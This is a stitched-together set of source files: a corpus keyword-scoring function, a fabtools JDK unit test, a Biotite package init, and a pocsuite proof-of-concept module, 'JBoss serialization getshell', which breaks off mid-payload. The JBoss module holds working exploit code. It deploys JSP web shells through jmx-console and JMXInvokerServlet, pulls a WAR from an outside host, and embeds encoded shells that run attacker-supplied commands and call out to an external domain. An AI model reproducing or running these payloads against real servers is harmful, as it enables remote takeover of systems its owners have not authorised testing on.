get keywords in target corpus compared to reference corpus
this should probably become some kind of row-wise df.apply method
"""
# get total num words in ref corpus
key_scores = {}
ref_sum = sum(reference_corpus.values())
if isinstance(target_corpus, dict):
target_sum = sum(target_corpus.values())
if isinstance(target_corpus, Series):
target_sum = target_corpus.sum()
# get words to calculate
if calc_all:
wordlist = list(set(list(target_corpus.keys()) + list(reference_corpus.keys())))
else:
wordlist = list(target_corpus.keys())
wordlist = [(word, reference_corpus[word]) for word in wordlist]
for w, s in wordlist:
if s < threshold:
global skipped
skipped += 1
continue
word_in_ref = reference_corpus.get(w, 0)
word_in_target = target_corpus.get(w, 0)
if kwargs.get('only_words_in_both_corpora'):
if word_in_ref == 0:
continue
score = measure_func(word_in_ref, word_in_target, ref_sum, target_sum)
key_scores[w] = score
return key_scores
# load string ref corp
if isinstance(reference_corpus, STRINGTYPE):
from corpkit.other import load
ldr = kwargs.get('loaddir', 'dictionaries')
reference_corpus = load(reference_corpus, loaddir=ldr)
# if a corpus interrogation, assume we want results
if isinstance(target_corpus, Interrogation):
reference_corpus = reference_corpus.results
# turn data into dict
loaded_ref_corpus = data_to_dict(reference_corpus)
df = target_corpus
index_names = list(df.index)
results = {}
threshold = set_threshold(threshold)
global skipped
skipped = 0
# figure out which measure we're using
if measure == 'll':
measure_func = log_likelihood_measure
elif measure == 'pd':
measure_func = perc_diff_measure
else:
raise NotImplementedError("Only 'll' and 'pd' measures defined so far.")
for subcorpus in index_names:
if selfdrop:
ref_calc = loaded_ref_corpus - Counter(reference_corpus.ix[subcorpus].to_dict())
else:
ref_calc = loaded_ref_corpus
results[subcorpus] = calc_keywords(df.ix[subcorpus], ref_calc)
if print_info:
print('Skipped %d entries under threshold (%d)\n' % (skipped, threshold))
df = DataFrame(results).T
df.sort_index()
if not sort_by:
df = df[list(df.sum().sort_values(ascending=False).index)]
return df
|
fabtools/tests/test_oracle_jdk.py | timgates42/fabtools | 308 | 12610773 | <reponame>timgates42/fabtools
import mock
import unittest
class OracleJdkTestCase(unittest.TestCase):
@mock.patch('fabtools.oracle_jdk.get_arch')
def test_jdk_arch_for_x64_system(self, get_arch):
from fabtools.oracle_jdk import _required_jdk_arch
get_arch.return_value = 'x86_64'
self.assertEqual('x64', _required_jdk_arch())
@mock.patch('fabtools.oracle_jdk.get_arch')
def test_jdk_arch_for_32bit_system(self, get_arch):
from fabtools.oracle_jdk import _required_jdk_arch
for system_arch in ['i386', 'i486', 'i586', 'i686']:
get_arch.return_value = system_arch
self.assertEqual('i586', _required_jdk_arch())
@mock.patch('fabtools.oracle_jdk.get_arch')
def test_jdk_arch_for_unknown_system(self, get_arch):
from fabtools.oracle_jdk import _required_jdk_arch
get_arch.return_value = 'unknown'
self.assertRaises(Exception, _required_jdk_arch)
def test_jdk_version_with_update_over_ten(self):
from fabtools.oracle_jdk import _extract_jdk_version
java_version_out = '''java version "1.7.0_13"
Java(TM) SE Runtime Environment (build 1.7.0_13-b20)
Java HotSpot(TM) Client VM (build 23.7-b01, mixed mode)
'''
self.assertEqual('7u13-b20', _extract_jdk_version(java_version_out))
def test_jdk_version_with_update_under_ten(self):
from fabtools.oracle_jdk import _extract_jdk_version
java_version_out = '''java version "1.7.0_09"
Java(TM) SE Runtime Environment (build 1.7.0_09-b05)
Java HotSpot(TM) 64-Bit Server VM (build 23.5-b02, mixed mode)
'''
self.assertEqual('7u9-b05', _extract_jdk_version(java_version_out))
def test_jdk_version_with_openjdk(self):
from fabtools.oracle_jdk import _extract_jdk_version
java_version_out = '''java version "1.7.0_21"
OpenJDK Runtime Environment (IcedTea 2.3.9) (7u21-2.3.9-0ubuntu0.12.04.1)
OpenJDK 64-Bit Server VM (build 23.7-b01, mixed mode)
'''
self.assertEqual(None, _extract_jdk_version(java_version_out))
|
src/biotite/application/sra/__init__.py | danijoo/biotite | 208 | 12610782 | <filename>src/biotite/application/sra/__init__.py<gh_stars>100-1000
# This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
"""
A subpackage for obtaining sequencing data from the *NCBI*
*sequence read archive* (SRA).
"""
__name__ = "biotite.application.sra"
__author__ = "<NAME>"
from .app import * |
vul/13-JBoss-serialization-getshell.py | zx273983653/vulscan | 582 | 12610787 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""
#命令行
from pocsuite import pocsuite_cli
#验证模块
from pocsuite import pocsuite_verify
#攻击模块
from pocsuite import pocsuite_attack
#控制台模式
from pocsuite import pocsuite_console
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
"""
JBoss 三种POC漏洞检测 author:https://github.com/joaomatosf/jexboss
"""
from sys import exit, version_info
from time import sleep
from random import randint
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
try:
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
except ImportError:
ver = version_info[0] if version_info[0] >= 3 else ""
raise ("\n * Package urllib3 not installed. Please install the package urllib3 before continue.\n"
+ " Example: \n"
+ " # apt-get install python%s-pip ; easy_install%s urllib3\n" % (ver, ver))
from urllib3 import disable_warnings, PoolManager
from urllib3.util.timeout import Timeout
#忽略 提示的警告信息
disable_warnings()
#线程安全池
timeout = Timeout(connect=3.0, read=6.0)
pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
user_agents = ["Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36",
"Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"]
class JbossPOC(POCBase):
vulID = '13' # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
version = '1' #默认为1
vulDate = '2017-06-29' #漏洞公开的时间,不知道就写今天
author = '<EMAIL>' # PoC作者的大名
createDate = '2017-06-29'# 编写 PoC 的日期
updateDate = '2017-06-29'# PoC 更新的时间,默认和编写时间一样
references = 'https://github.com/Xyntax/POC-T'# 漏洞地址来源,0day不用写
name = 'JBoss serialization getshell'# PoC 名称
appPowerLink = 'http://www.jboss.org/'# 漏洞厂商主页地址
appName = 'JBoss'# 漏洞应用名称
appVersion = 'www.seebug.org/vuldb/ssvid-89723'# 漏洞影响版本
vulType = 'code-exec'#漏洞类型,类型参考见 漏洞类型规范表
desc = '''
Jboss 反序列化漏洞
''' # 漏洞简要描述
samples = ["192.168.127.12:8087","172.16.17.32:8087",]# 测试样列,就是用 PoC 测试成功的网站
install_requires = [] # PoC 第三方模块依赖,请尽量不要使用第三方模块,必要时请参考《PoC第三方模块依赖说明》填写
cvss = u"严重" #严重,高危,中危,低危
def get_successfully(self,url, path):
"""
Test if a GET to a URL is successful
:param url: The base URL
:param path: The URL path
:return: The HTTP status code
"""
sleep(5)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.request('GET', url + path, redirect=False, headers=headers, timeout=3)
result = r.status
if result == 404:
sleep(7)
r = pool.request('GET', url + path, redirect=False, headers=headers, timeout=3)
result = r.status
return result
def exploit_jmx_console_main_deploy(self,url):
"""
Exploit MainDeployer to deploy a JSP shell. Does not work in JBoss 5 (bug in JBoss 5).
/jmx-console/HtmlAdaptor
:param url: The url to exploit
:return: The HTTP status code
"""
if not 'http' in url[:4]:
url = "http://" + url
jsp = "http://www.joaomatosf.com/rnp/jexws.war"
payload = ("/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service="
"MainDeployer&methodIndex=19&arg0=" + jsp)
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_console_file_repository(self,url):
"""
Exploit DeploymentFileRepository to deploy a JSP shell
Tested and working in JBoss 4, 5. Does not work in JBoss 6.
/jmx-console/HtmlAdaptor
:param url: The URL to exploit
:return: The HTTP status code
"""
jsp = ("%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75"
"%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%2c%20%6a%61%76%61%2e%6e"
"%65%74%2e%2a%22%20%70%61%67%65%45%6e%63%6f%64%69%6e%67%3d%22%55%54%46"
"%2d%38%22%25%3e%3c%70%72%65%3e%3c%25%69%66%20%28%72%65%71%75%65%73%74"
"%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%70%70%70%22%29%20%21%3d"
"%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%77%72%69%74%65%70%65"
"%72%6d%69%73%73%69%6f%6e%20%3d%20%28%6e%65%77%20%44%61%74%65%28%29%2e"
"%74%6f%53%74%72%69%6e%67%28%29%2e%73%70%6c%69%74%28%22%3a%22%29%5b%30"
"%5d%2b%22%68%2e%6c%6f%67%22%29%2e%72%65%70%6c%61%63%65%41%6c%6c%28%22"
"%20%22%2c%20%22%2d%22%29%3b%20%53%74%72%69%6e%67%20%73%68%5b%5d%20%3d"
"%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22"
"%70%70%70%22%29%2e%73%70%6c%69%74%28%22%20%22%29%3b%20%63%68%65%63%6b"
"%2e%73%65%74%52%65%71%75%65%73%74%50%72%6f%70%65%72%74%79%28%22%55%73"
"%65%72%2d%41%67%65%6e%74%22%2c%20%72%65%71%75%65%73%74%2e%67%65%74%48"
"%65%61%64%65%72%28%22%48%6f%73%74%22%29%2b%22%3c%2d%22%2b%72%65%71%75"
"%65%73%74%2e%67%65%74%52%65%6d%6f%74%65%41%64%64%72%28%29%29%3b%20%69"
"%66%20%28%21%6e%65%77%20%46%69%6c%65%28%22%63%68%65%63%6b%5f%22%2b%77"
"%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%2e%65%78%69%73%74%73%28"
"%29%29%7b%20%50%72%69%6e%74%57%72%69%74%65%72%20%77%72%69%74%65%72%20"
"%3d%20%6e%65%77%20%50%72%69%6e%74%57%72%69%74%65%72%28%22%63%68%65%63"
"%6b%5f%22%2b%77%72%69%74%65%70%65%72%6d%69%73%73%69%6f%6e%29%3b%20%63"
"%68%65%63%6b%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20"
"%77%72%69%74%65%72%2e%63%6c%6f%73%65%28%29%3b%20%7d%20%65%6c%73%65%20"
"%69%66%20%28%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%64%22"
"%29%20%7c%7c%20%73%68%5b%30%5d%2e%63%6f%6e%74%61%69%6e%73%28%22%69%70"
"%63%6f%6e%66%69%67%22%29%29%20%63%68%65%63%6b%2e%67%65%74%49%6e%70%75"
"%74%53%74%72%65%61%6d%28%29%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73"
"%73%20%70%3b%20%69%66%20%28%53%79%73%74%65%6d%2e%67%65%74%50%72%6f%70"
"%65%72%74%79%28%22%6f%73%2e%6e%61%6d%65%22%29%2e%74%6f%4c%6f%77%65%72"
"%43%61%73%65%28%29%2e%69%6e%64%65%78%4f%66%28%22%77%69%6e%22%29%20%3e"
"%20%30%29%7b%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e"
"%74%69%6d%65%28%29%2e%65%78%65%63%28%22%63%6d%64%2e%65%78%65%20%2f%63"
"%20%22%2b%73%68%29%3b%20%7d%20%65%6c%73%65%20%7b%70%20%3d%20%52%75%6e"
"%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28"
"%73%68%29%3b%7d%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%64%20"
"%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65"
"%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67"
"%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%53%74%72%69"
"%6e%67%20%64%69%73%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b"
"%20%77%68%69%6c%65%20%28%64%69%73%72%20%21%3d%20%6e%75%6c%6c%29%20%7b"
"%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73"
"%72%20%3d%20%64%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%63%61"
"%74%63%68%28%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%6f%75%74%2e%70"
"%72%69%6e%74%6c%6e%28%22%55%6e%6b%6e%6f%77%6e%20%63%6f%6d%6d%61%6e%64"
"%2e%22%29%3b%7d%7d%25%3e")
payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
"DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
"jexws.war&argType=java.lang.String&arg1=jexws&argType=java.lang.St"
"ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
pool.request('HEAD', url + payload, redirect=False, headers=headers, timeout=3)
return self.get_successfully(url, "/jexws/jexws.jsp")
def exploit_jmx_invoker_file_repository(self,url, version):
"""
Exploits the JMX invoker
tested and works in JBoss 4, 5
MainDeploy, shell in data
# /invoker/JMXInvokerServlet
:param url: The URL to exploit
:return:
"""
payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
"\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
"\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
"\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
"\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
"\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
"\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
payload += (
"\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
"\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
"\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
"\x00\x00\x05\xaa\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
"\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
"\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
"\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
"\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
"\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
"\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
"\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
"\x00\x00\x00\x00\x00\x05\x74\x00\x0a\x6a\x65\x78\x69\x6e\x76\x2e\x77\x61\x72"
"\x74\x00\x06\x6a\x65\x78\x69\x6e\x76\x74\x00\x04\x2e\x6a\x73\x70\x74\x04\x71"
"\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61"
"\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
"\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67\x65\x45"
"\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e\x3c\x70"
"\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74"
"\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d"
"\x20\x6e\x75\x6c\x6c\x29\x7b\x20\x55\x52\x4c\x20\x75\x72\x6c\x20\x3d\x20\x6e"
"\x65\x77\x20\x55\x52\x4c\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73"
"\x68\x65\x6c\x6c\x2e\x6a\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x22\x29"
"\x3b\x20\x48\x74\x74\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e"
"\x20\x63\x68\x65\x63\x6b\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c\x43\x6f"
"\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x75\x72\x6c\x2e\x6f\x70\x65\x6e\x43"
"\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x53\x74\x72\x69\x6e\x67"
"\x20\x77\x72\x69\x74\x65\x70\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x20\x3d\x20"
"\x28\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e"
"\x67\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22"
"\x68\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28"
"\x22\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
"\x68\x5b\x5d\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61"
"\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x2e\x73\x70\x6c\x69"
"\x74\x28\x22\x20\x22\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x73\x65\x74\x52\x65"
"\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x55\x73\x65\x72"
"\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
"\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73\x74\x22\x29\x2b\x22\x3c\x2d"
"\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x52\x65\x6d\x6f\x74\x65"
"\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20\x28\x21\x6e\x65\x77\x20\x46"
"\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70"
"\x65\x72\x6d\x69\x73\x73\x69\x6f\x6e\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29"
"\x29\x7b\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74"
"\x65\x72\x20\x3d\x20\x6e\x65\x77\x20\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65"
"\x72\x28\x22\x63\x68\x65\x63\x6b\x5f\x22\x2b\x77\x72\x69\x74\x65\x70\x65\x72"
"\x6d\x69\x73\x73\x69\x6f\x6e\x29\x3b\x20\x63\x68\x65\x63\x6b\x2e\x67\x65\x74"
"\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x3b\x20\x77\x72\x69\x74"
"\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20"
"\x69\x66\x20\x28\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28"
"\x22\x69\x64\x22\x29\x20\x7c\x7c\x20\x73\x68\x5b\x30\x5d\x2e\x63\x6f\x6e\x74"
"\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x29\x29\x20\x63"
"\x68\x65\x63\x6b\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d"
"\x28\x29\x3b\x20\x74\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70"
"\x3b\x20\x69\x66\x20\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f"
"\x70\x65\x72\x74\x79\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f"
"\x4c\x6f\x77\x65\x72\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66"
"\x28\x22\x77\x69\x6e\x22\x29\x20\x3e\x20\x30\x29\x7b\x20\x70\x20\x3d\x20\x52"
"\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x7a\x00"
"\x00\x01\xb2\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d\x64\x2e\x65\x78\x65"
"\x20\x2f\x63\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x7b"
"\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65\x74\x52\x75\x6e\x74"
"\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68\x29\x3b\x7d\x20\x42\x75"
"\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x64\x20\x3d\x20\x6e\x65"
"\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65"
"\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72"
"\x28\x70\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29"
"\x29\x29\x3b\x20\x53\x74\x72\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64"
"\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20"
"\x28\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75"
"\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x64\x69\x73\x72\x29\x3b\x20\x64\x69"
"\x73\x72\x20\x3d\x20\x64\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20"
"\x7d\x20\x7d\x63\x61\x74\x63\x68\x28\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x20"
"\x65\x29\x20\x7b\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28\x22\x55\x6e"
"\x6b\x6e\x6f\x77\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2e\x22\x29\x3b\x7d\x7d"
"\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x42\x6f\x6f"
"\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee\x02\x00\x01\x5a\x00\x05\x76"
"\x61\x6c\x75\x65\x78\x70\x01\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"
"\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47"
"\x02\x00\x00\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
"\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00\x7e\x00\x0f"
"\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65\x61\x6e\x69\x0e\x8b\x92"
"\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67\x2e"
"\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e"
"\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9"
"\x02\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x04"
"\x70\x78")
headers = {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue",
"Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
"Connection": "keep-alive",
"User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
r = pool.urlopen('POST', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
result = r.status
if result == 401:
pass
pool.urlopen('HEAD', url + "/invoker/JMXInvokerServlet", redirect=False, headers=headers, body=payload)
return self.get_successfully(url, "/jexinv/jexinv.jsp")
def exploit_web_console_invoker(self,url):
"""
Exploits web console invoker
Does not work in JBoss 5 (bug in JBoss5)
:param url: The URL to exploit
:return: The HTTP status code
"""
payload = (
"\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
"\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f"
"\x74\x65\x4d\x42\x65\x61\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f"
"\xa3\x7a\x74\xae\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e"
"\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74"
"\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73\x74\x00\x13\x5b\x4c"
"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x5b\x00"
"\x09\x73\x69\x67\x6e\x61\x74\x75\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61"
"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72"
"\x67\x65\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a\x61"
"\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f\x4f\x62\x6a\x65"
"\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06\x64\x65\x70\x6c\x6f\x79\x75"
"\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65"
